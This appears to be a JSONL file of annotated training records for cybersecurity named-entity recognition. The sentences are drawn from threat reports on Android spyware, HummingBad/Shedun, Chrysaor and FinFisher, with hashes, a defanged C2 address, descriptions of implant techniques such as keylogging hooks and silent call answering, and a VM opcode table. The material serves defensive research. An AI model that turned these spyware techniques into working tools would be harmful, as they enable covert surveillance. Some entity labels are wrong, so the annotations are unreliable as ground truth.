{"text": "Emergency SMS commands .", "spans": {}, "info": {"id": "cyner_train_000617", "source": "cyner_train"}}
{"text": "Interestingly , there is an allowlist of tapped activities : ui.ConversationActivity ui.ConversationListActivity SemcInCallScreen Quadrapop SocialPhonebookActivity The listener can operate with only coordinates , so it calculates pressed characters by matching given values with hardcoded ones : Additionally , if there is a predefined command , the keylogger can make a screenshot of the tapped display area : Manual access and operator menu There is a hidden menu ( Activity ) for controlling implant features that", "spans": {}, "info": {"id": "cyner_train_000621", "source": "cyner_train"}}
{"text": "looks like it was created for manual operator control .", "spans": {}, "info": {"id": "cyner_train_000622", "source": "cyner_train"}}
{"text": "It also shows a current malware log .", "spans": {}, "info": {"id": "cyner_train_000624", "source": "cyner_train"}}
{"text": "Infrastructure FTP server The attackers used ftp : //213.174.157 [ .", "spans": {}, "info": {"id": "cyner_train_000625", "source": "cyner_train"}}
{"text": "] 151/ as a command and control server .", "spans": {}, "info": {"id": "cyner_train_000626", "source": "cyner_train"}}
{"text": "The IP belongs to the free Russian web hosting service Ucoz .", "spans": {}, "info": {"id": "cyner_train_000627", "source": "cyner_train"}}
{"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play.google.com/store/apps/details ?", "spans": {}, "info": {"id": "cyner_train_000628", "source": "cyner_train"}}
{"text": "id=eu.chainfire.supersu ) tool 246.us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk", "spans": {"SYSTEM: Android": [[244, 251]], "ORGANIZATION: ASUS": [[384, 388]]}, "info": {"id": "cyner_train_000629", "source": "cyner_train"}}
{"text": "Corrupted archive privapp.txt Looks like a list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently .", "spans": {}, "info": {"id": "cyner_train_000630", "source": "cyner_train"}}
{"text": "Content of bdata.xml file : It can be added to the /system/etc/sysconfig/ path to allowlist specified implant components from the battery saving system .", "spans": {}, "info": {"id": "cyner_train_000631", "source": "cyner_train"}}
{"text": "10 million Android phones infected by all-powerful auto-rooting apps First detected in November , Shedun/HummingBad infections are surging .", "spans": {"SYSTEM: Android": [[11, 18]], "MALWARE: Shedun/HummingBad": [[98, 115]]}, "info": {"id": "cyner_train_000633", "source": "cyner_train"}}
{"text": "FURTHER READING New type of auto-rooting Android adware is nearly impossible to remove Researchers from security firm Check Point Software said the malware installs more than 50,000 fraudulent apps each day , displays 20 million malicious advertisements , and generates more than $ 300,000 per month in revenue .", "spans": {"SYSTEM: Android": [[41, 48]], "ORGANIZATION: Check Point Software": [[118, 138]]}, "info": {"id": "cyner_train_000635", "source": "cyner_train"}}
{"text": "The Check Point researchers have dubbed the malware family \" HummingBad , '' but researchers from mobile security company Lookout say HummingBad is in fact Shedun , a family of auto-rooting malware that came to light last November and had already infected a large number of devices .", "spans": {"ORGANIZATION: Check Point": [[4, 15]], "MALWARE: HummingBad": [[61, 71], [134, 144]], "ORGANIZATION: Lookout": [[122, 129]], "MALWARE: Shedun": [[156, 162]]}, "info": {"id": "cyner_train_000637", "source": "cyner_train"}}
{"text": "Update Jul 11 2016 8:32 : On Monday , a Checkpoint representative disputed Lookout 's contention and pointed to this blog post from security firm Eleven Paths as support .", "spans": {"ORGANIZATION: Checkpoint": [[40, 50]], "ORGANIZATION: Lookout": [[75, 82]], "ORGANIZATION: Eleven Paths": [[146, 158]]}, "info": {"id": "cyner_train_000638", "source": "cyner_train"}}
{"text": "In an e-mail , a Lookout representative stood by its analysis and said company researchers planned to publish an in-depth response in the coming days .", "spans": {"ORGANIZATION: Lookout": [[17, 24]]}, "info": {"id": "cyner_train_000640", "source": "cyner_train"}}
{"text": "For the past five months , Check Point researchers have quietly observed the China-based advertising company behind HummingBad in several ways , including by infiltrating the command and control servers it uses .", "spans": {"ORGANIZATION: Check Point": [[27, 38]], "MALWARE: HummingBad": [[116, 126]]}, "info": {"id": "cyner_train_000641", "source": "cyner_train"}}
{"text": "HummingBad does this by silently installing promoted apps on infected phones , defrauding legitimate mobile advertisers , and creating fraudulent statistics inside the official Google Play Store .", "spans": {"MALWARE: HummingBad": [[0, 10]], "SYSTEM: Google Play Store": [[177, 194]]}, "info": {"id": "cyner_train_000643", "source": "cyner_train"}}
{"text": "\" Accessing these devices and their sensitive data creates a new and steady stream of revenue for cybercriminals , '' Check Point researchers wrote in a recently published report .", "spans": {}, "info": {"id": "cyner_train_000644", "source": "cyner_train"}}
{"text": "\" Emboldened by financial and technological independence , their skillsets will advance–putting end users , enterprises , and government agencies at risk .", "spans": {}, "info": {"id": "cyner_train_000645", "source": "cyner_train"}}
{"text": "'' The report said HummingBad apps are developed by Yingmob , a Chinese mobile ad server company that other researchers claim is behind the Yinspector iOS malware .", "spans": {"MALWARE: HummingBad": [[19, 29]], "ORGANIZATION: Yingmob": [[52, 59]], "MALWARE: Yinspector": [[140, 150]], "SYSTEM: iOS": [[151, 154]]}, "info": {"id": "cyner_train_000646", "source": "cyner_train"}}
{"text": "HummingBad sends notifications to Umeng , a tracking and analytics service attackers use to manage their campaign .", "spans": {"MALWARE: HummingBad": [[0, 10]]}, "info": {"id": "cyner_train_000647", "source": "cyner_train"}}
{"text": "The researchers wrote : While profit is powerful motivation for any attacker , Yingmob ’ s apparent self-sufficiency and organizational structure make it well-positioned to expand into new business ventures , including productizing the access to the 85 million Android devices it controls .", "spans": {"ORGANIZATION: Yingmob": [[79, 86]], "SYSTEM: Android": [[261, 268]]}, "info": {"id": "cyner_train_000649", "source": "cyner_train"}}
{"text": "This alone would attract a whole new audience–and a new stream of revenue–for Yingmob .", "spans": {"ORGANIZATION: Yingmob": [[78, 85]]}, "info": {"id": "cyner_train_000650", "source": "cyner_train"}}
{"text": "One involves drive-by downloads , possibly on booby-trapped porn sites .", "spans": {}, "info": {"id": "cyner_train_000653", "source": "cyner_train"}}
{"text": "In some cases , malicious components are dynamically downloaded onto a device after an infected app is installed .", "spans": {}, "info": {"id": "cyner_train_000657", "source": "cyner_train"}}
{"text": "From there , infected phones display illegitimate ads and install fraudulent apps after certain events , such as rebooting , the screen turning on or off , a detection that the user is present , or a change in Internet connectivity .", "spans": {}, "info": {"id": "cyner_train_000658", "source": "cyner_train"}}
{"text": "HummingBad also has the ability to inject code into Google Play to tamper with its ratings and statistics .", "spans": {"MALWARE: HummingBad": [[0, 10]], "SYSTEM: Google Play": [[52, 63]]}, "info": {"id": "cyner_train_000659", "source": "cyner_train"}}
{"text": "It does this by using infected devices to imitate clicks on the install , buy , and accept buttons .", "spans": {}, "info": {"id": "cyner_train_000660", "source": "cyner_train"}}
{"text": "Many of the 10 million infected phones are running old versions of Android and reside in China ( 1.6 million ) and India ( 1.35 million ) .", "spans": {"SYSTEM: Android": [[67, 74]]}, "info": {"id": "cyner_train_000661", "source": "cyner_train"}}
{"text": "Still , US-based infected phones total almost 287,000 .", "spans": {}, "info": {"id": "cyner_train_000662", "source": "cyner_train"}}
{"text": "The most widely infected major Android versions are KitKat with 50 percent , followed by Jelly Bean with 40 percent .", "spans": {"SYSTEM: Android": [[31, 38]], "SYSTEM: KitKat": [[52, 58]], "SYSTEM: Jelly Bean": [[89, 99]]}, "info": {"id": "cyner_train_000663", "source": "cyner_train"}}
{"text": "It 's often hard for average users to know if their phones have been rooted , and Shedun apps often wait some period of time before displaying obtrusive ads or installing apps .", "spans": {"MALWARE: Shedun": [[82, 88]]}, "info": {"id": "cyner_train_000665", "source": "cyner_train"}}
{"text": "The best bet for Readers who want to make sure their phone is n't infected is to scan their phones using the free version of the Lookout Security and Antivirus app .", "spans": {"ORGANIZATION: Lookout": [[129, 136]]}, "info": {"id": "cyner_train_000666", "source": "cyner_train"}}
{"text": "Android malware has drastically lower rates of success when app installations outside of Google Play are barred .", "spans": {"SYSTEM: Android": [[0, 7]], "SYSTEM: Google Play": [[89, 100]]}, "info": {"id": "cyner_train_000667", "source": "cyner_train"}}
{"text": "Top 20 countries targeted by Hummingbad/Shedun .", "spans": {"MALWARE: Hummingbad/Shedun": [[29, 46]]}, "info": {"id": "cyner_train_000669", "source": "cyner_train"}}
{"text": "Enlarge / Top 20 countries targeted by Hummingbad/Shedun .", "spans": {"MALWARE: Hummingbad/Shedun": [[39, 56]]}, "info": {"id": "cyner_train_000670", "source": "cyner_train"}}
{"text": "Check Point Software Hummingbad/Shedun infections by Android version .", "spans": {"ORGANIZATION: Check Point Software": [[0, 20]], "MALWARE: Hummingbad/Shedun": [[21, 38]], "SYSTEM: Android": [[53, 60]]}, "info": {"id": "cyner_train_000671", "source": "cyner_train"}}
{"text": "Enlarge / Hummingbad/Shedun infections by Android version .", "spans": {"MALWARE: Hummingbad/Shedun": [[10, 27]], "SYSTEM: Android": [[42, 49]]}, "info": {"id": "cyner_train_000672", "source": "cyner_train"}}
{"text": "Check Point Software So far , HummingBad has been observed using its highly privileged status only to engage in click fraud , display pop-up ads , tamper with Google Play , and install additional apps that do more of the same .", "spans": {"ORGANIZATION: Check Point Software": [[0, 20]], "MALWARE: HummingBad": [[30, 40]], "SYSTEM: Google Play": [[159, 170]]}, "info": {"id": "cyner_train_000673", "source": "cyner_train"}}
{"text": "But there 's little stopping it from doing much worse .", "spans": {}, "info": {"id": "cyner_train_000674", "source": "cyner_train"}}
{"text": "That 's because the malware roots most of the phones it infects , a process that subverts key security mechanisms built into Android .", "spans": {"SYSTEM: Android": [[125, 132]]}, "info": {"id": "cyner_train_000675", "source": "cyner_train"}}
{"text": "Under a model known as sandboxing , most Android apps are n't permitted to access passwords or other data available to most other apps .", "spans": {"SYSTEM: Android": [[41, 48]]}, "info": {"id": "cyner_train_000676", "source": "cyner_train"}}
{"text": "System applications with root , by contrast , have super-user permissions that allow them to break out of such sandboxes .", "spans": {}, "info": {"id": "cyner_train_000677", "source": "cyner_train"}}
{"text": "Lookout said in its own blog post published Wednesday that its threat detection network has recently observed a surge of Shedun attacks , indicating the scourge wo n't be going away any time soon .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: Shedun": [[121, 127]]}, "info": {"id": "cyner_train_000680", "source": "cyner_train"}}
{"text": "An investigation of Chrysaor Malware on Android 03 April 2017 Google is constantly working to improve our systems that protect users from Potentially Harmful Applications ( PHAs ) .", "spans": {"MALWARE: Chrysaor": [[20, 28]], "SYSTEM: Android": [[40, 47]], "ORGANIZATION: Google": [[62, 68]]}, "info": {"id": "cyner_train_000681", "source": "cyner_train"}}
{"text": "However , a few PHA authors spend substantial effort , time , and money to create and install their harmful app on one or a very small number of devices .", "spans": {}, "info": {"id": "cyner_train_000683", "source": "cyner_train"}}
{"text": "In this blog post , we describe Chrysaor , a newly discovered family of spyware that was used in a targeted attack on a small number of Android devices , and how investigations like this help Google protect Android users from a variety of threats .", "spans": {"MALWARE: Chrysaor": [[32, 40]], "SYSTEM: Android": [[136, 143], [207, 214]], "ORGANIZATION: Google": [[192, 198]]}, "info": {"id": "cyner_train_000685", "source": "cyner_train"}}
{"text": "Chrysaor is spyware believed to be created by NSO Group Technologies , specializing in the creation and sale of software and infrastructure for targeted attacks .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "ORGANIZATION: NSO Group Technologies": [[46, 68]]}, "info": {"id": "cyner_train_000687", "source": "cyner_train"}}
{"text": "Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS and analyzed by Citizen Lab and Lookout .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "MALWARE: Pegasus": [[42, 49]], "SYSTEM: iOS": [[87, 90]], "ORGANIZATION: Citizen Lab": [[107, 118]], "ORGANIZATION: Lookout": [[123, 130]]}, "info": {"id": "cyner_train_000688", "source": "cyner_train"}}
{"text": "Late last year , after receiving a list of suspicious package names from Lookout , we discovered that a few dozen Android devices may have installed an application related to Pegasus , which we named Chrysaor .", "spans": {"ORGANIZATION: Lookout": [[73, 80]], "SYSTEM: Android": [[114, 121]], "MALWARE: Pegasus": [[175, 182]], "MALWARE: Chrysaor": [[200, 208]]}, "info": {"id": "cyner_train_000689", "source": "cyner_train"}}
{"text": "Although the applications were never available in Google Play , we immediately identified the scope of the problem by using Verify Apps .", "spans": {"SYSTEM: Google Play": [[50, 61]], "SYSTEM: Verify Apps": [[124, 135]]}, "info": {"id": "cyner_train_000690", "source": "cyner_train"}}
{"text": "We gathered information from affected devices , and concurrently , attempted to acquire Chrysaor apps to better understand its impact on users .", "spans": {"MALWARE: Chrysaor": [[88, 96]]}, "info": {"id": "cyner_train_000691", "source": "cyner_train"}}
{"text": "We 've contacted the potentially affected users , disabled the applications on affected devices , and implemented changes in Verify Apps to protect all users .", "spans": {"SYSTEM: Verify Apps": [[125, 136]]}, "info": {"id": "cyner_train_000692", "source": "cyner_train"}}
{"text": "What is the scope of Chrysaor ?", "spans": {"MALWARE: Chrysaor": [[21, 29]]}, "info": {"id": "cyner_train_000693", "source": "cyner_train"}}
{"text": "Chrysaor was never available in Google Play and had a very low volume of installs outside of Google Play .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "SYSTEM: Google Play": [[32, 43], [93, 104]]}, "info": {"id": "cyner_train_000694", "source": "cyner_train"}}
{"text": "Among the over 1.4 billion devices protected by Verify Apps , we observed fewer than 3 dozen installs of Chrysaor on victim devices .", "spans": {"SYSTEM: Verify Apps": [[48, 59]], "MALWARE: Chrysaor": [[105, 113]]}, "info": {"id": "cyner_train_000695", "source": "cyner_train"}}
{"text": "These devices were located in the following countries : How we protect you To protect Android devices and users , Google Play provides a complete set of security services that update outside of platform releases .", "spans": {"SYSTEM: Android": [[86, 93]], "SYSTEM: Google Play": [[114, 125]]}, "info": {"id": "cyner_train_000696", "source": "cyner_train"}}
{"text": "Users do n't have to install any additional security services to keep their devices safe .", "spans": {}, "info": {"id": "cyner_train_000697", "source": "cyner_train"}}
{"text": "In 2016 , these services protected over 1.4 billion devices , making Google one of the largest providers of on-device security services in the world : Identify PHAs using people , systems in the cloud , and data sent to us from devices Warn users about or blocking users from installing PHAs Continually scan devices for PHAs and other harmful threats Additionally , we are providing detailed technical information to help the security industry in our collective work against PHAs .", "spans": {"ORGANIZATION: Google": [[69, 75]]}, "info": {"id": "cyner_train_000698", "source": "cyner_train"}}
{"text": "What do I need to do ?", "spans": {}, "info": {"id": "cyner_train_000699", "source": "cyner_train"}}
{"text": "It is extremely unlikely you or someone you know was affected by Chrysaor malware .", "spans": {"MALWARE: Chrysaor": [[65, 73]]}, "info": {"id": "cyner_train_000700", "source": "cyner_train"}}
{"text": "Through our investigation , we identified less than 3 dozen devices affected by Chrysaor , we have disabled Chrysaor on those devices , and we have notified users of all known affected devices .", "spans": {"MALWARE: Chrysaor": [[80, 88], [108, 116]]}, "info": {"id": "cyner_train_000701", "source": "cyner_train"}}
{"text": "To ensure you are fully protected against PHAs and other threats , we recommend these 5 basic steps : Install apps only from reputable sources : Install apps from a reputable source , such as Google Play .", "spans": {"SYSTEM: Google Play": [[192, 203]]}, "info": {"id": "cyner_train_000703", "source": "cyner_train"}}
{"text": "No Chrysaor apps were on Google Play .", "spans": {"MALWARE: Chrysaor": [[3, 11]], "SYSTEM: Google Play": [[25, 36]]}, "info": {"id": "cyner_train_000704", "source": "cyner_train"}}
{"text": "Enable a secure lock screen : Pick a PIN , pattern , or password that is easy for you to remember and hard for others to guess .", "spans": {}, "info": {"id": "cyner_train_000705", "source": "cyner_train"}}
{"text": "Update your device : Keep your device up-to-date with the latest security patches .", "spans": {}, "info": {"id": "cyner_train_000706", "source": "cyner_train"}}
{"text": "Locate your device : Practice finding your device with Android Device Manager because you are far more likely to lose your device than install a PHA .", "spans": {"SYSTEM: Android Device Manager": [[55, 77]]}, "info": {"id": "cyner_train_000708", "source": "cyner_train"}}
{"text": "How does Chrysaor work ?", "spans": {"MALWARE: Chrysaor": [[9, 17]]}, "info": {"id": "cyner_train_000709", "source": "cyner_train"}}
{"text": "To install Chrysaor , we believe an attacker coaxed specifically targeted individuals to download the malicious software onto their device .", "spans": {"MALWARE: Chrysaor": [[11, 19]]}, "info": {"id": "cyner_train_000710", "source": "cyner_train"}}
{"text": "One representative sample Chrysaor app that we analyzed was tailored to devices running Jellybean ( 4.3 ) or earlier .", "spans": {"MALWARE: Chrysaor": [[26, 34]], "SYSTEM: Jellybean ( 4.3 )": [[88, 105]]}, "info": {"id": "cyner_train_000712", "source": "cyner_train"}}
{"text": "The following is a review of scope and impact of the Chrysaor app named com.network.android tailored for a Samsung device target , with SHA256 digest : ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5Upon installation , the app uses known framaroot exploits to escalate privileges and break Android 's application sandbox .", "spans": {"MALWARE: Chrysaor": [[53, 61]], "ORGANIZATION: Samsung": [[107, 114]], "SYSTEM: Android": [[307, 314]]}, "info": {"id": "cyner_train_000713", "source": "cyner_train"}}
{"text": "If the targeted device is not vulnerable to these exploits , then the app attempts to use a superuser binary pre-positioned at /system/csk to elevate privileges .", "spans": {}, "info": {"id": "cyner_train_000714", "source": "cyner_train"}}
{"text": "After escalating privileges , the app immediately protects itself and starts to collect data , by : Installing itself on the /system partition to persist across factory resets Removing Samsung 's system update app ( com.sec.android.fotaclient ) and disabling auto-updates to maintain persistence ( sets Settings.System.SOFTWARE_UPDATE_AUTO_UPDATE to 0 ) Deleting WAP push messages and changing WAP message settings , possibly for anti-forensic purpose .", "spans": {"ORGANIZATION: Samsung": [[185, 192]]}, "info": {"id": "cyner_train_000715", "source": "cyner_train"}}
{"text": "Starting content observers and the main task loop to receive remote commands and exfiltrate data The app uses six techniques to collect user data : Repeated commands : use alarms to periodically repeat actions on the device to expose data , including gathering location data .", "spans": {}, "info": {"id": "cyner_train_000716", "source": "cyner_train"}}
{"text": "Content observers : use Android 's ContentObserver framework to gather changes in SMS , Calendar , Contacts , Cell info , Email , WhatsApp , Facebook , Twitter , Kakao , Viber , and Skype .", "spans": {"SYSTEM: Android": [[24, 31]], "SYSTEM: SMS": [[82, 85]], "SYSTEM: Calendar": [[88, 96]], "SYSTEM: Contacts": [[99, 107]], "SYSTEM: Cell info": [[110, 119]], "SYSTEM: Email": [[122, 127]], "SYSTEM: WhatsApp": [[130, 138]], "SYSTEM: Facebook": [[141, 149]], "SYSTEM: Twitter": [[152, 159]], "SYSTEM: Kakao": [[162, 167]], "SYSTEM: Viber": [[170, 175]], "SYSTEM: Skype": [[182, 187]]}, "info": {"id": "cyner_train_000719", "source": "cyner_train"}}
{"text": "Screenshots : captures an image of the current screen via the raw frame buffer .", "spans": {}, "info": {"id": "cyner_train_000720", "source": "cyner_train"}}
{"text": "Keylogging : record input events by hooking IPCThreadState : :Transact from /system/lib/libbinder.so , and intercepting android : :parcel with the interface com.android.internal.view.IInputContext .", "spans": {}, "info": {"id": "cyner_train_000721", "source": "cyner_train"}}
{"text": "RoomTap : silently answers a telephone call and stays connected in the background , allowing the caller to hear conversations within the range of the phone 's microphone .", "spans": {}, "info": {"id": "cyner_train_000722", "source": "cyner_train"}}
{"text": "If the user unlocks their device , they will see a black screen while the app drops the call , resets call settings and prepares for the user to interact with the device normally .", "spans": {}, "info": {"id": "cyner_train_000723", "source": "cyner_train"}}
{"text": "Finally , the app can remove itself through three ways : Via a command from the server Autoremove if the device has not been able to check in to the server after 60 days Via an antidote file .", "spans": {}, "info": {"id": "cyner_train_000724", "source": "cyner_train"}}
{"text": "If /sdcard/MemosForNotes was present on the device , the Chrysaor app removes itself from the device .", "spans": {"MALWARE: Chrysaor": [[57, 65]]}, "info": {"id": "cyner_train_000725", "source": "cyner_train"}}
{"text": "Samples uploaded to VirusTotal To encourage further research in the security community , we ’ ve uploaded these sample Chrysaor apps to Virus Total .", "spans": {"ORGANIZATION: VirusTotal": [[20, 30]], "MALWARE: Chrysaor": [[119, 127]], "ORGANIZATION: Virus Total": [[136, 147]]}, "info": {"id": "cyner_train_000726", "source": "cyner_train"}}
{"text": "Package Name SHA256 digest SHA1 certificate com.network.android ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5 44f6d1caa257799e57f0ecaf4e2e216178f4cb3d com.network.android 3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86 516f8f516cc0fd8db53785a48c0a86554f75c3ba", "spans": {}, "info": {"id": "cyner_train_000727", "source": "cyner_train"}}
{"text": "Additional digests with links to Chrysaor As a result of our investigation we have identified these additional Chrysaor-related apps .", "spans": {"MALWARE: Chrysaor": [[33, 41]], "MALWARE: Chrysaor-related": [[111, 127]]}, "info": {"id": "cyner_train_000728", "source": "cyner_train"}}
{"text": "Package Name SHA256 digest SHA1 certificate com.network.android 98ca5f94638768e7b58889bb5df4584bf5b6af56b188da48c10a02648791b30c 516f8f516cc0fd8db53785a48c0a86554f75c3ba com.network.android 5353212b70aa096d918e4eb6b49eb5ad8f59d9bec02d089e88802c01e707c3a1", "spans": {}, "info": {"id": "cyner_train_000729", "source": "cyner_train"}}
{"text": "44f6d1caa257799e57f0ecaf4e2e216178f4cb3d com.binary.sms.receiver 9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy e384694d3d17cd88ec3a66c740c6398e07b8ee401320ca61e26bdf96c20485b4", "spans": {}, "info": {"id": "cyner_train_000730", "source": "cyner_train"}}
{"text": "7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 12e085ab85db887438655feebd249127d813e31df766f8c7b009f9519916e389 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 6348104f8ef22eba5ac8ee737b192887629de987badbb1642e347d0dd01420f8", "spans": {}, "info": {"id": "cyner_train_000731", "source": "cyner_train"}}
{"text": "31a8633c2cd67ae965524d0b2192e9f14d04d016 FinFisher exposed : A researcher ’ s tale of defeating traps , tricks , and complex virtual machines March 1 , 2018 Office 365 Advanced Threat Protection ( Office 365 ATP ) blocked many notable zero-day exploits in 2017 .", "spans": {"MALWARE: FinFisher": [[41, 50]], "SYSTEM: Office 365 Advanced Threat Protection": [[157, 194]], "SYSTEM: Office 365 ATP": [[197, 211]]}, "info": {"id": "cyner_train_000732", "source": "cyner_train"}}
{"text": "This threat actor is remarkable for two reasons : Its access to sophisticated zero-day exploits for Microsoft and Adobe software Its use of an advanced piece of government-grade surveillance spyware FinFisher , also known as FinSpy and detected by Microsoft security products as Wingbird FinFisher is such a complex piece of malware that , like other researchers , we had to devise special methods to crack it .", "spans": {"ORGANIZATION: Microsoft": [[100, 109], [248, 257]], "ORGANIZATION: Adobe": [[114, 119]], "MALWARE: FinFisher": [[199, 208], [288, 297]], "MALWARE: FinSpy": [[225, 231]], "MALWARE: Wingbird": [[279, 287]]}, "info": {"id": "cyner_train_000734", "source": "cyner_train"}}
{"text": "This task proved to be nontrivial .", "spans": {}, "info": {"id": "cyner_train_000736", "source": "cyner_train"}}
{"text": "FinFisher is not afraid of using all kinds of tricks , ranging from junk instructions and “ spaghetti code ” to multiple layers of virtual machines and several known and lesser-known anti-debug and defensive measures .", "spans": {"MALWARE: FinFisher": [[0, 9]]}, "info": {"id": "cyner_train_000737", "source": "cyner_train"}}
{"text": "Security analysts are typically equipped with the tools to defeat a good number of similar tricks during malware investigations .", "spans": {}, "info": {"id": "cyner_train_000738", "source": "cyner_train"}}
{"text": "The intricate anti-analysis methods reveal how much effort the FinFisher authors exerted to keep the malware hidden and difficult to analyze .", "spans": {"MALWARE: FinFisher": [[63, 72]]}, "info": {"id": "cyner_train_000741", "source": "cyner_train"}}
{"text": "This exercise revealed tons of information about techniques used by FinFisher that we used to make Office 365 ATP more resistant to sandbox detection and Windows Defender ATP to catch similar techniques and generic behaviors .", "spans": {"MALWARE: FinFisher": [[68, 77]], "SYSTEM: Office 365 ATP": [[99, 113]], "SYSTEM: Windows Defender ATP": [[154, 174]]}, "info": {"id": "cyner_train_000742", "source": "cyner_train"}}
{"text": "Generic Windows Defender ATP detections trigger alerts on FinFisher behavior While our analysis has allowed us to immediately protect our customers , we ’ d like to share our insights and add to the growing number of published analyses by other talented researchers ( listed below this blog post ) .", "spans": {"SYSTEM: Windows Defender ATP": [[8, 28]], "MALWARE: FinFisher": [[58, 67]]}, "info": {"id": "cyner_train_000746", "source": "cyner_train"}}
{"text": "Spaghetti and junk codes make common analyst tools ineffective In analyzing FinFisher , the first obfuscation problem that requires a solution is the removal of junk instructions and “ spaghetti code ” , which is a technique that aims to confuse disassembly programs .", "spans": {"MALWARE: FinFisher": [[76, 85]]}, "info": {"id": "cyner_train_000748", "source": "cyner_train"}}
{"text": "Armed with this code , we removed this first layer of anti-analysis protection .", "spans": {}, "info": {"id": "cyner_train_000755", "source": "cyner_train"}}
{"text": "Removing the junk instructions revealed a readable block of code .", "spans": {}, "info": {"id": "cyner_train_000756", "source": "cyner_train"}}
{"text": "The big first buffer is used as index for multiple concurrent threads .", "spans": {}, "info": {"id": "cyner_train_000758", "source": "cyner_train"}}
{"text": "A big chunk of data is extracted from the portable executable ( PE ) file itself and decrypted two times using a custom XOR algorithm .", "spans": {}, "info": {"id": "cyner_train_000759", "source": "cyner_train"}}
{"text": "We determined that this chunk of data contains an array of opcode instructions ready to be interpreted by a custom virtual machine program ( from this point on referenced generically as “ VM ” ) implemented by FinFisher authors .", "spans": {"MALWARE: FinFisher": [[210, 219]]}, "info": {"id": "cyner_train_000760", "source": "cyner_train"}}
{"text": "The stages of the FinFisher multi-layered protection mechanisms Stage 0 : Dropper with custom virtual machine The main dropper implements the VM dispatcher loop and can use 32 different opcodes handlers .", "spans": {"MALWARE: FinFisher": [[18, 27]]}, "info": {"id": "cyner_train_000762", "source": "cyner_train"}}
{"text": "The VM dispatcher loop routine ends with a JMP to another routine .", "spans": {}, "info": {"id": "cyner_train_000764", "source": "cyner_train"}}
{"text": "In total , there are 32 different routines , each of them implementing a different opcode and some basic functionality that the malware program may execute .", "spans": {}, "info": {"id": "cyner_train_000765", "source": "cyner_train"}}
{"text": "A snapshot of the code that processes each VM opcode and the associate interpreter The presence of a VM and virtualized instruction blocks can be described in simpler terms : Essentially , the creators of FinFisher interposed a layer of dynamic code translation ( the virtual machine ) that makes analysis using regular tools practically impossible .", "spans": {"MALWARE: snapshot": [[2, 10]], "MALWARE: FinFisher": [[205, 214]]}, "info": {"id": "cyner_train_000767", "source": "cyner_train"}}
{"text": "Static analysis tools like IDA may not be useful in analyzing custom code that is interpreted and executed through a VM and a new set of instructions .", "spans": {}, "info": {"id": "cyner_train_000768", "source": "cyner_train"}}
{"text": "At this stage , the analysis can only continue by manually investigating the individual code blocks and opcode handlers , which are highly obfuscated ( also using spaghetti code ) .", "spans": {}, "info": {"id": "cyner_train_000770", "source": "cyner_train"}}
{"text": "Reusing our deobfuscation tool and some other tricks , we have been able to reverse and analyze these opcodes and map them to a finite list that can be used later to automate the analysis process with some scripting .", "spans": {}, "info": {"id": "cyner_train_000771", "source": "cyner_train"}}
{"text": "The opcode instructions generated by this custom VM are divided into different categories : Logical opcodes , which implement bit-logic operators ( OR , AND , NOT , XOR ) and mathematical operators Conditional branching opcodes , which implement a code branch based on conditions ( equals to JC , JE , JZ , other similar branching opcodes ) Load/Store opcodes , which write to or read from particular addresses of the virtual address space of the process Specialized opcodes for various purposes ,", "spans": {}, "info": {"id": "cyner_train_000772", "source": "cyner_train"}}
{"text": "like execute specialized machine instruction that are not virtualized We are publishing below the ( hopefully ) complete list of opcodes used by FinFisher VM that we found during our analysis and integrated into our de-virtualization script : INDEX MNEMONIC DESCRIPTION 0x0 EXEC Execute machine code 0x1 JG Jump if greater/Jump if not less or equal 0x2 WRITE Write a value into the dereferenced internal VM value ( treated as a pointer ) 0x3 JNO Jump if not overflow 0x4 JLE Jump", "spans": {"MALWARE: FinFisher": [[145, 154]]}, "info": {"id": "cyner_train_000773", "source": "cyner_train"}}
{"text": "if less or equal ( signed ) 0x5 MOV Move the value of a register into the VM descriptor ( same as opcode 0x1F ) 0x6 JO Jump if overflow 0x7 PUSH Push the internal VM value to the stack 0x8 ZERO Reset the internal VM value to 0 ( zero ) 0x9 JP Jump if parity even 0xA WRITE Write into an address 0xB ADD Add the value of a register to the internal VM value 0xC JNS Jump if not signed 0xD JL Jump if less ( signed ) 0xE", "spans": {}, "info": {"id": "cyner_train_000774", "source": "cyner_train"}}
{"text": "EXEC Execute machine code and branch 0xF JBE Jump if below or equal or Jump if not above 0x10 SHL Shift left the internal value the number of times specified into the opcodes 0x11 JA Jump if above/Jump if not below or equal 0x12 MOV Move the internal VM value into a register 0x13 JZ JMP if zero 0x14 ADD Add an immediate value to the internal Vm descriptor 0x15 JB Jump if below ( unsigned ) 0x16 JS Jump if signed 0x17 EXEC Execute", "spans": {}, "info": {"id": "cyner_train_000775", "source": "cyner_train"}}
{"text": "machine code ( same as opcode 0x0 ) 0x18 JGE Jump if greater or equal/Jump if not less 0x19 DEREF Write a register value into a dereferenced pointer 0x1A JMP Special obfuscated “ Jump if below ” opcode 0x1B * Resolve a pointer 0x1C LOAD Load a value into the internal VM descriptor 0x1D JNE Jump if not equal/Jump if not zero 0x1E CALL Call an external function or a function located in the dropper 0x1F MOV", "spans": {}, "info": {"id": "cyner_train_000776", "source": "cyner_train"}}
{"text": "Move the value of a register into the VM descriptor 0x20 JNB Jump if not below/Jump if above or equal/Jump if not carry 0x21 JNP Jump if not parity/Jump if parity odd Each virtual instruction is stored in a special data structure that contains all the information needed to be properly read and executed by the VM .", "spans": {}, "info": {"id": "cyner_train_000777", "source": "cyner_train"}}
